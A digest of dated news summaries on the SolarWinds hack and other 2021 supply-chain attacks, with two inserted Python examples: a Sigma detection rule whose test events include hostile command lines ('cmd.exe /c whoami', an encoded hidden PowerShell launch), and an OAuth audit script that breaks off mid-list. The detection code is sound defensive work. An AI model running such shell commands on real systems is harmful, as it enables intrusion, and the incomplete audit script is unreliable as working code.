Stepped up patching for the SolarWinds and Microsoft Exchange vulnerabilities has allowed the White House to stand down the two Unified Coordination Groups (UCGs) tasked with tackling the government's response to the cybersecurity threats. They were activated shortly after each incident was discovered.

Ref - GCN 

_______________________________________________________________________________________

(April 19, 2021)


SolarWinds backdoor was downloaded by 1/4th of Electric Utilities - US Utility Regulator

North American Electric Reliability Corp. (NERC), a non-profit regulatory authority that oversees utilities in the United States and Canada, revealed this week that about 25% of the electric utilities on the North American power grid downloaded the SolarWinds backdoor.

Ref - CPO Magazine 

_______________________________________________________________________________________

(April 19, 2021)


Positive Technologies denies involvement in SolarWinds attack

Responding to sanctions imposed by the US government, Russia-headquartered cybersecurity company Positive Technologies (PT) has denied any wrongdoing, and dismissed the claims as “groundless accusation”. Last week, the US Department of the Treasury imposed sanctions on several Russian technology firms, including PT, accusing them of helping Russian state actors to conduct cyberattacks against the West.

Ref - TechRadar 

_______________________________________________________________________________________

(April 19, 2021)


XCSSET malware now targeting Apple's M1-based Macs

A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors to websites via Universal Cross-site Scripting (UXSS) attacks.


_______________________________________________________________________________________

(April 19, 2021)


Codecov hack could be another SolarWinds-type attack

US federal authorities are investigating a security breach suffered by software auditing company Codecov. According to a statement put out by the San Francisco-based firm, an unscrupulous user broke through its digital defenses and modified its Bash Uploader script. While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.

Ref - TechRadar

_______________________________________________________________________________________

(April 19, 2021)


Zero-trust is the best defense against third-party attacks

Adopting a zero-trust security strategy can better safeguard organizations against third-party attacks, where suppliers should not simply be entrusted to do the right thing. The Acronis CEO believed third-party attacks such as those involving Accellion and Singapore Airlines (SIA) could have been prevented with a zero-trust architecture. Zero trust isn't just about not trusting anyone, it's about personal cyber hygiene.

Ref - ZDNet

_______________________________________________________________________________________

(April 19, 2021)


Next SolarWinds crisis could happen very soon

The SolarWinds cyberattack, which saw around 100 companies and 9 US federal agencies compromised, isn’t one to be treated as an isolated incident. It is rather a stark warning of what is to come if decisive action isn’t taken. The vice-president and chief information security officer at Hitachi Vantara discusses how companies can avoid a similar supply-chain crisis.


_______________________________________________________________________________________

(April 17, 2021)


SolarWinds hacking campaign puts Microsoft in the hot seat

Microsoft has offered all federal agencies a year of “advanced” security features at no extra charge. Microsoft also removed names of several Russian IT companies, including Positive Technologies, from a list to whom Microsoft supplied the early access to data on vulnerabilities detected in its products.

Ref - Yahoo 

_______________________________________________________________________________________

(April 17, 2021)


Six out of 11 EU agencies running SolarWinds Orion software were hacked

CERT-EU confirmed that 14 EU agencies were running the SolarWinds Orion monitoring software, and six of them were breached. However, CERT-EU did not reveal the names of the EU agencies that installed the tainted Orion updates. CERT-EU said that some agencies sent limited details on the attacks, while in other cases network logs, used to hunt for clues about the hackers’ actions, were often not available.


_______________________________________________________________________________________

(April 17, 2021)


Biden upends U.S. convention on cyber espionage

President Biden’s decision to punish Russia for the SolarWinds hack broke with years of U.S. foreign policy that has tolerated cyber espionage as an acceptable form of 21st-century spycraft. The administration also said U.S. intelligence had “high confidence” that Russia’s foreign intelligence service, the SVR, was behind last year’s SolarWinds hack, which compromised at least nine federal agencies and about 100 private-sector organizations.


_______________________________________________________________________________________

(April 16, 2021)


Commerce Dept. may have found SolarWinds backdoor in Aug. 2020

Last month, Microsoft and FireEye identified that file as a newly-discovered fourth malware backdoor used in the sprawling SolarWinds supply chain hack. FireEye refers to the backdoor as “Sunshuttle,” whereas Microsoft calls it “GoldMax.” A search in VirusTotal’s malware repository shows that on Aug. 13, 2020, someone from the National Telecommunications and Information Administration (NTIA), a division of the U.S. Commerce Department, had uploaded a file with that same name and file hashes.


_______________________________________________________________________________________

(April 16, 2021)


More countries officially blame Russia for SolarWinds attack

The United Kingdom, Canada, the European Union, and NATO have expressed support for the United States in blaming Russia for the cyberattack on IT management company SolarWinds, which impacted organizations worldwide. The announcements were made the same day that the United States expelled 10 Russian diplomats and sanctioned dozens of companies and people.


_______________________________________________________________________________________

(April 16, 2021)


The untold story of the SolarWinds hack

Hackers believed to be directed by the Russian intelligence service, the SVR, used the routine software update to slip malicious code into Orion's software and then used it as a vehicle for a massive cyberattack against America. The concern is that the same access that gives the Russians the ability to steal data could also allow them to alter or destroy it.

Ref - NPR 

_______________________________________________________________________________________

(April 15, 2021)


The U.S. imposes sanctions on Russia over cyber-attacks

The US has announced sanctions against Russia in response to what it says are cyber-attacks and other hostile acts. The measures, which target dozens of Russian entities and officials, aim to deter Russia's harmful foreign activities. The statement says Russian intelligence was behind last year's massive SolarWinds hack and accuses Moscow of interference in the 2020 election.
 
Ref - BBC

_______________________________________________________________________________________

(April 15, 2021)


Codecov Bash Uploader tool compromised in supply chain hack

At the beginning of April, security professionals at Codecov learned that someone had gained unauthorized access to their Bash Uploader script and modified it without permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify the Bash Uploader script.


_______________________________________________________________________________________

(April 15, 2021)


Biden unveiled Russia sanctions over SolarWinds hack 

Ten Russian diplomatic officials are to be expelled from the US and up to 30 entities will be blacklisted in the largest round of sanctions action against Russia of Joe Biden’s presidency. The US is set to announce new sanctions against Russia as soon as Thursday in retaliation for Moscow’s interference in elections, alleged bounties on US soldiers in Afghanistan, and cyber-espionage campaigns such as the SolarWinds hack, according to reports in US and international media.


_______________________________________________________________________________________

(April 14, 2021)


The misuse of X.509 certificates & keys in SolarWinds hack

A report described the misuse of X.509 certificates and keys in the SolarWinds attack and how Cryptomathic CKMS and CSG could help protect against such attacks. While multiple failures led to the attack, one of the most glaring failures was that the attackers could misuse X.509 certificates and keys to forge and undermine trust. 


_______________________________________________________________________________________

(April 14, 2021)


Advanced supply chain attacks need a strategic counter-defense policy

Enterprise CIOs and CISOs in government and the private sector are still assessing the full impact of the advanced supply chain attacks uncovered in recent months. The fact of the matter here is that cyber is where the new wars are being fought and supply chain attacks are a winning playbook for the state-sponsored attackers.


_______________________________________________________________________________________

(April 14, 2021) 


Sunburst hack costs SolarWinds at least $18M

SolarWinds disclosed that it took a hit of at least $18 million from the massive Russian malware attack that compromised its flagship Orion technology management software. In releasing preliminary first-quarter results, SolarWinds said it spent $18 million to $19 million to investigate and remediate the cyber incident, related legal and other professional services, and consulting services provided to customers at no charge.

Ref - CFO

_______________________________________________________________________________________

(April 13, 2021)


macOS malware hidden in the npm package supply chain

A new malicious package has been spotted on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems. The malicious package is called "web-browserify," and imitates the popular Browserify npm component downloaded over 160 million times over its lifetime.


_______________________________________________________________________________________
 
(April 13, 2021) 


U.S. intelligence community details growing influence threats in wake of SolarWinds attacks

The intelligence community made its most direct public attribution yet that Russia was behind weaving malicious code into a SolarWinds software update to facilitate a sweeping espionage operation, impacting hundreds of companies and U.S. federal agencies. The readout does not specify whether Biden specifically discussed SolarWinds with his Russian counterpart.

Ref - CyberScoop 

_______________________________________________________________________________________

(April 13, 2021) 


Spy Chiefs to warn of threats from SolarWinds to North Korea

Biden’s intelligence team -- including Director of National Intelligence Avril Haines and CIA Director William Burns -- is under increasing pressure to respond to a widening series of national security threats while defending the administration’s continuing reviews and policy approaches even as it nears the 100-day mark in office.

Ref - Bloomberg

_______________________________________________________________________________________

(April 13, 2021) 


Detecting the next SolarWinds-Style cyberattack

Developing SIEM rules, using the SolarWinds attack as an example, can help detect the next SolarWinds-like attack. Sigma rules serve as a common language for writing and sharing detection queries regardless of which SIEM an organization uses, which lets security operations teams build the detection logic once and deploy it everywhere. The same Sigma rule can be converted for multiple SIEMs, including Splunk, QRadar, and Azure Sentinel.
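To make the "one rule, many SIEMs" point concrete, here is an added example (not code from the original article or from the Sigma project): a single Sigma-style rule, held as a Python dict with the same structure as a Sigma YAML file, evaluated locally against constructed process-creation events and then rendered to Splunk SPL and Sentinel KQL. The rule mirrors widely published SUNBURST detections that flag the Orion plugin host, SolarWinds.BusinessLayerHost.exe, spawning a command shell; the Sysmon-style field names, the placeholder filter, the index and table names, and the events are this example's assumptions, not anything the article states.

```python
"""Sigma-style rule shared across SIEMs: evaluated locally, then rendered to Splunk
SPL and Sentinel KQL. Added example; Sysmon event ID 1 field names and the
SUNBURST-style rule logic are this example's assumptions."""
RULE = {
    "title": "Command shell spawned by the SolarWinds Orion plugin host",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "ParentImage|endswith": "\\SolarWinds.BusinessLayerHost.exe",
            "Image|endswith": ["\\cmd.exe", "\\powershell.exe"],
        },
        # Placeholder exception; replace with an allowlist you have actually vetted.
        "filter": {"CommandLine|contains": "\\Orion\\Maintenance\\"},
        "condition": "selection and not filter",
    },
}

ORION = r"C:\Program Files (x86)\SolarWinds\Orion"
BLH = ORION + r"\SolarWinds.BusinessLayerHost.exe"

def _ev(i, parent, image, cmdline):
    return {"id": i, "ParentImage": parent, "Image": image, "CommandLine": cmdline}

EVENTS = [  # constructed process-creation events; ids 1 and 3 are the true positives
    _ev(1, BLH, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    _ev(2, BLH, ORION + r"\SolarWinds.Reporting.exe", "SolarWinds.Reporting.exe"),
    _ev(3, BLH, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -nop -w hidden -enc ..."),
    _ev(4, BLH, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "' + ORION + r'\Maintenance\cleanup.bat"'),
]

def _field_match(event, key, expected):
    """One Sigma field test (modifiers: endswith, contains, none); case-insensitive as Sigma specifies."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    for value in (expected if isinstance(expected, list) else [expected]):
        value = str(value).lower()
        if (modifier == "endswith" and actual.endswith(value)
                or modifier == "contains" and value in actual
                or modifier == "" and actual == value):
            return True
    return False

def evaluate_condition(condition, truth):
    """Recursive-descent evaluation of Sigma's 'a and not (b or c)' condition grammar."""
    toks, pos = condition.replace("(", " ( ").replace(")", " ) ").split(), [0]
    def take():
        pos[0] += 1
        return toks[pos[0] - 1]
    def factor():  # NAME | 'not' factor | '(' expr ')'
        tok = take()
        if tok == "not":
            return not factor()
        if tok != "(":
            return truth[tok]
        value = expr()
        take()  # the closing ')'
        return value
    def chain(sub, keyword, combine):  # sub (keyword sub)*, every operand evaluated
        value = sub()
        while pos[0] < len(toks) and toks[pos[0]] == keyword:
            take()
            value = combine(value, sub())
        return value
    def term():
        return chain(factor, "and", lambda a, b: a and b)
    def expr():
        return chain(term, "or", lambda a, b: a or b)
    return expr()

DIALECTS = {  # how each SIEM spells the same predicate; index/table names are placeholders
    "splunk": {"endswith": '{f}="*{v}"', "contains": '{f}="*{v}*"', "": '{f}="{v}"',
               "and": "AND", "or": "OR", "not": "NOT", "wrap": "index=windows EventCode=1 {q}"},
    "kql": {"endswith": '{f} endswith "{v}"', "contains": '{f} contains "{v}"', "": '{f} =~ "{v}"',
            "and": "and", "or": "or", "not": "not", "wrap": "ProcessEvents | where {q}"},
}

def render(rule, dialect):
    """Translate the rule to one SIEM's query language (backslashes escaped for quoted strings)."""
    d, det, out = DIALECTS[dialect], rule["detection"], []
    for tok in det["condition"].replace("(", " ( ").replace(")", " ) ").split():
        if tok in ("and", "or", "not"):
            out.append(d[tok])
        elif tok in ("(", ")"):
            out.append(tok)
        else:  # a named selection: AND across fields, OR across a field's list of values
            clauses = []
            for key, expected in det[tok].items():
                field, _, modifier = key.partition("|")
                values = expected if isinstance(expected, list) else [expected]
                parts = [d[modifier].format(f=field, v=str(v).replace("\\", "\\\\")) for v in values]
                clauses.append("(" + f" {d['or']} ".join(parts) + ")")
            out.append("(" + f" {d['and']} ".join(clauses) + ")")
    return d["wrap"].format(q=" ".join(out))

def hunt(rule, events):
    """Return the ids of the events the rule fires on."""
    det = rule["detection"]
    names = [n for n in det if n != "condition"]
    return [ev["id"] for ev in events if evaluate_condition(det["condition"], {
        n: all(_field_match(ev, k, v) for k, v in det[n].items()) for n in names})]

if __name__ == "__main__":
    print(render(RULE, "splunk"))
    print(render(RULE, "kql"))
    print("hits:", hunt(RULE, EVENTS))
```

The local evaluator is the useful part for a detection engineer: it lets you unit-test a rule against captured true and false positives before any SIEM conversion, so that the allowlist in `filter` is exercised (event 4 is suppressed, events 1 and 3 fire) and a later edit cannot silently widen or blind the rule. Real Sigma backends add a field-mapping layer on top of what `render` does here, which is what makes the same rule portable between Sysmon, EDR and Sentinel schemas.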

_______________________________________________________________________________________

(April 12, 2021)


SolarWinds hack underscores the need for moving to the cloud

According to Microsoft CEO Satya Nadella, the SolarWinds attack underscores the importance of implementing zero trust architecture and migrating to the cloud. Nadella sees the SolarWinds hack as a wake-up call for all companies to take security as a first-class priority.

Ref - CRN

_______________________________________________________________________________________

(April 12, 2021)


Biden names former top NSA officials to two key cyber roles

President Biden has appointed former National Security Agency (NSA) deputy director Chris Inglis and former deputy for counterterrorism at the NSA Jen Easterly to two top cyber roles in the administration. The appointments come as the White House is still dealing with the fallout over the SolarWinds cyber attack, which infiltrated multiple federal agencies.

Ref - Axios
 
_______________________________________________________________________________________

(April 10, 2021)


APKPure users targeted via a supply chain attack

APKPure, one of the largest alternative app stores, was the victim of a supply chain attack in which threat actors compromised client version 3.17.18 to deliver malware. The app store is available only on devices that use Google Mobile Services (GMS) and are firmly tied to Google’s infrastructure. The tainted client downloads and installs various apps, including other malicious payloads.


_______________________________________________________________________________________

(April 9, 2021)


Stopping or preventing the next SolarWinds breach 

Mitigating the next SolarWinds breach will require more cyber-savvy people to assess and recognize those threats, explain their potential impact and advocate for enterprise-wide investment in the appropriate levels of protection. Additionally, it will require more boots on the ground in a field that has evolved to encompass a growing array of sub-areas and rapidly changing technologies.


_______________________________________________________________________________________

(April 9, 2021)


Gigaset devices laced with malware in the latest supply chain attack

Cybercriminals managed to sneak several malicious apps onto Gigaset Android devices by compromising a server belonging to an external update service provider. The affected models, according to Malwarebytes, include the Gigaset GS270 and GS160 and the Siemens GS270 and GS160 (all running Android 8), the Alps P40pro (Android 9), and the S20 pro+ (Android 10).

Ref - IT Pro

_______________________________________________________________________________________

(April 9, 2021)


Supply chain disruptions lead to the loss of trillions of dollars

Supply chain disruptions in 2020 had a real impact on the bottom line, with companies losing trillions of dollars in revenue, according to a recent survey in which 64% of respondents reported revenue losses of between 6% and 20%. The disruptions also hit brand reputation, with 38% of respondents reporting that their brands had been affected, and many said their struggles to maintain supplies of goods and services left customers frustrated.


_______________________________________________________________________________________

(April 9, 2021)


What the Titans of Industry Reveal about SolarWinds Attack

During the testimony, it was outlined how the SolarWinds software was hijacked and used to break into a host of other organizations, and that the hackers had been able to read Microsoft’s source code for user authentication. As CrowdStrike pointed out, the attackers also took advantage of well-known weaknesses in Windows authentication and Active Directory Federation Services (AD FS).


_______________________________________________________________________________________

(April 9, 2021)


How to protect against software supply-chain attacks

Organizations can protect themselves against supply-chain attacks with some simple measures: avoid the use of third-party modules, watch for threats when using modules by unknown authors, and perform automated scans of code submitted to repositories. They should also have a plan for external services and develop both an on-premises and a cloud strategy.

Ref - SCMagazine 

_______________________________________________________________________________________

(April 8, 2021)


CISA releases tool to review Microsoft 365 post-compromise activity

CISA has released a new tool, dubbed Aviary, that can help security teams visualize and analyze data outputs generated using Sparrow, an open-source PowerShell-based tool for detecting potentially compromised applications and accounts in Azure and Microsoft 365. Sparrow was created to help defenders hunt down threat activity after the SolarWinds supply-chain attack.


_______________________________________________________________________________________

(April 8, 2021)


How to minimize cyberattacks on supply and value chains

Organizations can mitigate access-related third-party risk in several ways: giving an identity to everything that connects to the enterprise, including people, systems, and things; using identity broker technology to verify credentials and enrich authentication requirements; and applying access governance to third-party identities while centrally managing all third-party access.


_______________________________________________________________________________________

(April 8, 2021)


Biden administration sets the stage for retaliation against Russia over SolarWinds attack

The Biden administration completed an intelligence review of alleged Russian meddling in the SolarWinds cybersecurity attack and interference in US elections. The review could set the stage for possible retaliatory actions like enacting sanctions or expulsion of Russian intel officers in the US.

Ref - Yahoo 

_______________________________________________________________________________________

(April 7, 2021)


In another supply chain incident, Gigaset injects malware into victims' phones

Android smartphones from Gigaset have been infected by malware directly from the manufacturer in what appears to be a supply-chain attack. The Trojan, once downloaded and installed on a victim's device via a poisoned software update from the vendor, is capable of opening browser windows, fetching more malicious apps, and sending people text messages to further spread the malware.

Ref - The Register 

_______________________________________________________________________________________

(April 7, 2021)


Supply-chain attacks - When trust goes wrong

Minimizing the risk of a supply-chain attack involves a never-ending loop of risk and compliance management. In the SolarWinds hack, only the post-attack in-depth inspection of the third-party vendor’s product identified the malicious code buried deep in the software. As a preventive measure, organizations need visibility into all of their suppliers and the components they deliver, including the policies and procedures each supplier has in place.


_______________________________________________________________________________________

(April 6, 2021)


Senators press for more on SolarWinds hack after AP report

Key lawmakers said they're concerned they've been kept in the dark about what suspected Russian hackers stole from the federal government and they pressed Biden administration officials for more details about the scope of what's known as the SolarWinds hack.


_______________________________________________________________________________________

(April 6, 2021)


RSA Conference 2021 will have a keynote from SolarWinds’s president

RSA Conference announced that Sudhakar Ramakrishna, President of SolarWinds, has joined the keynote line-up for RSA Conference 2021. He will be joined by Laura Koetzle to explore the technical elements of the breach and will provide a deep understanding of the sophistication of the overall operation of the nation-state attack.


_______________________________________________________________________________________

(April 5, 2021)


SolarWinds type attacks need a serious approach toward cybersecurity 

The federal government has to take cybersecurity more seriously, both from a funding and a legislation standpoint after the SolarWinds breach. There is some hope that this will happen with the new administration, but it remains to be seen if talk will turn into action and real change. Only with a concerted effort across all levels of government, big to small, national/state to local, will we be able to overcome this cyber assault and keep our citizens safe and secure.

Ref - GovTech

_______________________________________________________________________________________

(April 5, 2021)


The cybersecurity warning system in the U.S.

Many vulnerabilities and threats aren’t discovered by the government but are regularly uncovered by hackers who find bugs, notify companies, and often work with them to develop fixes. In turn, CISA can immediately issue directives, as it did during SolarWinds and the Microsoft Exchange compromise, that mandate action for federal agencies and sound the clarion call for others to heed.


_______________________________________________________________________________________

(April 2, 2021)


The importance of supply chain risk management

With cloud and digital technology allowing companies to flourish and succeed globally, the world has never been more interconnected. However, this comes with elevated risk. Partners, vendors, and third parties can expose companies and malicious hackers are known to target organizations through their supply chain. As a result, supply chain risk management has become a critical component of any company’s risk management and cybersecurity strategy.

Ref - Varonis

_______________________________________________________________________________________

(April 2, 2021)


The positive outcome from the SolarWinds breach

The SolarWinds compromise may have some positive outcomes by shining an even harsher light on the complacency that still exists when it comes to security, in particular the weaker security standards often applied to development and supplier systems compared with in-house production systems. Securing the supply chain has now become a hot topic, and organizations can do better at protecting their infrastructure.

Ref - BMC

_______________________________________________________________________________________

(April 2, 2021)


How Russian hackers targeted US cyber first responders in SolarWinds breach

After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down. The hackers identified a handful of key cybersecurity officials and analysts who would be among the first to respond once the hack was detected, so-called 'threat hunters,' and attempted to access their email accounts.

Ref - CNN 

_______________________________________________________________________________________

(April 1, 2021)


After the hack, officials draw attention to supply chain threats

The National Counterintelligence and Security Center warned that foreign hackers are increasingly targeting vendors and suppliers that work with the government to compromise their products in an effort to steal intellectual property and carry out espionage. The NCSC said it is working with other agencies, including the CISA to raise awareness of the supply chain issue.

Ref - AP News 

_______________________________________________________________________________________

(April 1, 2021)


Learnings from the SolarWinds supply chain attack

The recent SolarWinds attack (known as Sunburst) has shone a light on the controls required after a breach, with affected organizations laser-focused on what happened and what next. But the same controls that can help remediate the risks posed by this serious supply chain threat can also help prevent or limit the effect of this and other attacks before they happen.

Ref - Accenture

_______________________________________________________________________________________

(April 1, 2021)


The U.S. officials are drawing attention to the supply chain attacks

The U.S. government is working to draw attention to supply chain vulnerabilities, an issue that received particular attention late last year after suspected Russian hackers gained access to federal agencies and private corporations by sneaking malicious code into widely used software. The NCSC said it plans to issue guidance throughout the month about how specific sectors, like health care and energy, can protect themselves.


_______________________________________________________________________________________

(April 1, 2021)


The SolarWinds hack severity perception increased over time

(ISC)² has published the results of an online survey of 303 cybersecurity professionals on the SolarWinds Orion software breach. 86% of respondents rated the breach “very” or “extremely severe” when they first learned about it, and roughly six weeks after the incident was reported, as more details emerged, the share of respondents who rated the breach “severe” rose from 51% to 55%.


_______________________________________________________________________________________

(April 1, 2021)


A report with detailed analysis of SolarWinds hacking tools

US Cyber Command and the Department of Homeland Security (DHS) are preparing to release a detailed analysis of the hacking tools used in the SolarWinds attack, which targeted multiple federal agencies and private firms last year. The report was originally scheduled to be released on Wednesday, but the DHS delayed it without explanation. However, it's still expected to be published soon.

Ref - Computing

_______________________________________________________________________________________

(April 1, 2021)


DHS chief announces cybersecurity plan in wake of SolarWinds attacks

Homeland Security Secretary Alejandro Mayorkas warned that cyber threats are coming dangerously close to threatening people’s lives as he announced a series of sprints designed to counter online attacks. The series includes 60-day sprints, each focused on the most important and most urgent priorities needed to achieve goals.

Ref - Yahoo

_______________________________________________________________________________________

(March 31, 2021)


The SolarWinds breach is a wake-up call for the security community

The next time a SolarWinds-class attack occurs, the steps toward a successful response should already be defined. Understanding potential concentration risk may involve delving into third-party liabilities and obligations, categorizing vendors, and understanding the scope of the larger supplier ecosystem. By defining the potential sources of this risk, it becomes possible to build mitigation strategies into incident response plans.

Ref - Deloitte

_______________________________________________________________________________________

(March 30, 2021)


Executive order with 'a dozen' actions forthcoming after SolarWinds, Microsoft breaches

The Biden administration is working on “close to a dozen” action items to be included in an upcoming executive order meant to strengthen federal cybersecurity in the wake of two major breaches. The comments were made as the Biden administration continues to grapple with the fallout from both the recent attacks.

Ref - TheHill 

_______________________________________________________________________________________

(March 30, 2021)


Infosec community is concerned about SolarWinds hack

The severity of a data breach typically jumps in the short term and decreases as time progresses. But, according to a survey by International Information System Security Certification Consortium, or (ISC)2, the 2020 SolarWinds incident bucked that trend in the eyes of cybersecurity professionals. A month and a half after the incident was reported, the number of respondents who indicated the breach was “severe” increased from 51% to 55%.


_______________________________________________________________________________________

(March 30, 2021)


Details about the second elusive attack targeting SolarWinds software

Details about the scope and victims of Supernova, which exploited a flaw in SolarWinds' Orion network management software, so far have been scarce. Less than a handful of victims have been known to be targeted, and an investigation into the breach of one of those victims led to researchers at Secureworks tying the Supernova attacks to a previously unknown Chinese nation-state group they dubbed "Spiral."


_______________________________________________________________________________________

(March 30, 2021)


SolarWinds breach leads to distrust of software in use

Security experts say that because enterprises can't inspect the inner workings of the software they buy, they're at the mercy of software companies' security practices. In the SolarWinds attack, the attackers infected software that organizations trusted, and that software became a way to steal confidential information. This breach of trust in software is huge because software drives everything around tech firms.


_______________________________________________________________________________________

(March 30, 2021)


Trump administration emails were compromised in SolarWinds breach

An Associated Press report found that the head of DHS and the department's cyber-security staff were among the accounts exposed during the SolarWinds hack. Email accounts belonging to members of the Trump administration's Department of Homeland Security, including the head of the department, were reportedly compromised by suspected Russian hackers, according to the report.

Ref - Yahoo

_______________________________________________________________________________________

(March 29, 2021)


Key lessons from Sunburst

The cyber domain is a realm of intense interconnectivity that underpins much of daily life and national security. The discovery late in 2020 that Sunburst malware had infected not only thousands of private networks but also US government agencies, led some spectators to embrace alarmist views of this event as the first step in a full-fledged cyberwar.


_______________________________________________________________________________________

(March 29, 2021)


PHP's Git server hacked in a recent supply chain attack

In the latest software supply chain attack, the official PHP Git repository was hacked and the code base tampered with. Two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server. The threat actors signed off on these commits as if they had been made by known PHP developers and maintainers Rasmus Lerdorf and Nikita Popov.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds breach got emails of top DHS officials

Suspected Russian hackers gained access to email accounts belonging to the Trump administration’s head of the Department of Homeland Security and members of the department’s cybersecurity staff whose jobs included hunting threats from foreign countries. The intelligence value of the hacking of then-acting Secretary Chad Wolf and his staff is not publicly known.

Ref - AP News

_______________________________________________________________________________________

(March 29, 2021)


Need of a new alert system for cybersecurity

America needs a national cyber vulnerability early warning center after the recent SolarWinds breach. Just as a meteorologist is constantly on the lookout for storm systems, an early warning center would search widely used software and hardware components for vulnerabilities. It would discover new weaknesses before opponents, fortifying defenses and increasing the costs of mounting an attack.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds patches four new vulnerabilities in the Orion platform

SolarWinds released fixes for four new vulnerabilities in their Orion platform, the most severe of which is an authenticated remote code execution flaw due to a JSON deserialization weakness. Fixes for these weaknesses are in Orion Platform 2020.2.5.

Ref - Rapid7 

_______________________________________________________________________________________

(March 26, 2021)


SolarWinds hackers copied a limited number of source code repositories - Mimecast

A forensic investigation conducted by Mimecast and FireEye Mandiant incident response division found that SolarWinds hackers downloaded a limited number of the company’s source code repositories.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 26, 2021)


Software security is the top priority - SolarWinds CEO

SolarWinds has launched a Secure by Design initiative in response to the recent cybersecurity attack. This project is designed to build security into the design phase of software development and to make security an ongoing priority instead of an after-the-fact priority. The company is testing a design process that uses several parallel build chains simultaneously to create software instead of just one. 

Ref - TechRepublic 

_______________________________________________________________________________________

(March 26, 2021)


Lessons learned from the SolarWinds breach

A system like SolarWinds should have security checks built in from the start and the use of software signing keys should always be closely monitored. In addition, organizations need to adopt a zero-trust policy, stay vigilant, and create a security culture to prevent complex attacks like this.

Ref - Forbes

_______________________________________________________________________________________

(March 25, 2021)


Strategies to guard against email fraud in supply chain

Proofpoint has provided six recommendations to protect supply chain relationships: knowing who the suppliers are, considering the "spider web," creating more vendor accountability, being responsive to security-conscious users, relying more on automation, and finally implementing DMARC at the gateway.


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds breach - Key learnings

Security experts identified several critical learnings from the SolarWinds breach: threat hunting and threat intelligence built on artificial intelligence and machine learning; comprehensive detection with real-time continuous monitoring; a simplified incident response infrastructure capable of detecting attacks, containing the damage, and restoring systems and data; agile, integrated, and automated security technology; and dynamic remediation strategies designed to quickly return business operations to a trusted state.

Ref - OpenText

_______________________________________________________________________________________

(March 25, 2021)


Fed breach disclosure rule after SolarWinds breach

An executive order in the wake of the SolarWinds hack will require software vendors and service providers to notify their U.S. government clients if they experience a security breach. Major software companies like Microsoft and Salesforce that sell to the government would be affected by the executive order.

Ref - CRN

_______________________________________________________________________________________

(March 25, 2021)


Fresh code execution flaws in the SolarWinds Orion platform

SolarWinds has shipped a major security update to fix at least four documented vulnerabilities, including a pair of bugs that allow remote code execution. The patches were pushed out as a security update to the Orion Platform, the same SolarWinds product that was compromised in the recent nation-state software supply chain attack.


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds making changes in the build process after the hack

SolarWinds’ chief executive said the software provider made a series of changes to its build process and board room reporting structure in an effort to prevent another supply chain attack like the one experienced by the company. The company is also taking a series of actions designed to boost the profile of cybersecurity in business decisions and increase the autonomy of its chief information security officer and CIO shops.

Ref - SC Media

_______________________________________________________________________________________

(March 25, 2021)


Some powerful tactics to prevent supply chain attacks

Upguard recommends some defense tactics that organizations can implement to significantly decrease the chances of a supply chain attack. This includes implementing Honeytokens, securing privileged access management, implementing a Zero-Trust architecture, and assuming a breach mindset when preparing the security strategy.

Ref - Upguard 

_______________________________________________________________________________________

(March 25, 2021)


‘Trust no one’ becomes cyber mantra after massive hacking attacks

In the wake of two massive cyberattacks that exposed glaring deficiencies in U.S. defenses, government officials and cybersecurity practitioners are saying zero-trust may be the way to stop the cyber mayhem. Zero-trust reduces or prevents lateral movement and privilege escalation.

Ref - JapanTimes 

_______________________________________________________________________________________

(March 24, 2021)


Securing the software development build using secure design

SolarWinds SVP, Engineering Lee McClendon, KPMG Director of Cyber Security Services Caleb Queern, and Head Geek Thomas LaRock provide insights on how SolarWinds is prioritizing security in its software build environment, and what the entire industry can learn about next-generation software development.

Ref - SolarWinds 

_______________________________________________________________________________________

(March 24, 2021)


SolarWinds attack and other threats indicate increased nation-state activity

Cyber attacks launched by nation-states are becoming more proficient and aggressive. This was the message from Admiral (ret.) Michael S. Rogers at the NetDiligence Cyber War Webinar Series. He said that the breadth of activity has changed with the SolarWinds attack in December 2020 and the attack on Microsoft Exchange this month, both arguably evidence of increased nation-state activity.

Ref - Yahoo

_______________________________________________________________________________________

(March 23, 2021)


Attackers can abuse OAuth authentication apps used in the SolarWinds breach

Given the broad permissions they can hold over core cloud applications, OAuth apps have become a growing attack surface and vector. Attackers abuse OAuth apps in various ways, including by compromising app certificates, a technique also used in the SolarWinds / Solorigate campaign. With OAuth access, attackers can compromise and take over cloud accounts, and until the OAuth token is explicitly revoked, the attacker keeps persistent access to the user’s account and data.
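An added example, not from the original article or from Microsoft, of the audit a defender would run over Microsoft Graph output for the abuse patterns described above: tenant-wide consent grants of high-risk scopes, offline_access (which means long-lived refresh tokens), and freshly added or unusually long-lived app certificates and secrets. The object shapes follow Graph's oauth2PermissionGrant and servicePrincipal resources (keyCredentials and passwordCredentials); the tenant data, the risk thresholds and the scope list are constructed for the example and should be tuned to your own tenant.

```python
"""Audit OAuth consent grants and app credentials for the abuse patterns above.
Added example; object shapes follow Microsoft Graph's oauth2PermissionGrant and
servicePrincipal resources, and the tenant data and thresholds are constructed."""
from datetime import datetime, timedelta, timezone

NOW = datetime(2021, 3, 23, tzinfo=timezone.utc)  # fixed clock so the run is reproducible
HIGH_RISK_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send", "Files.Read.All",
                    "Files.ReadWrite.All", "Directory.ReadWrite.All", "Directory.AccessAsUser.All"}
NEW_CRED_WINDOW = timedelta(days=30)     # a credential added this recently deserves a second look
MAX_CRED_LIFETIME = timedelta(days=730)  # anything longer is a persistence gift to an intruder

SERVICE_PRINCIPALS = [  # constructed; one suspicious app, one ordinary user-consented app
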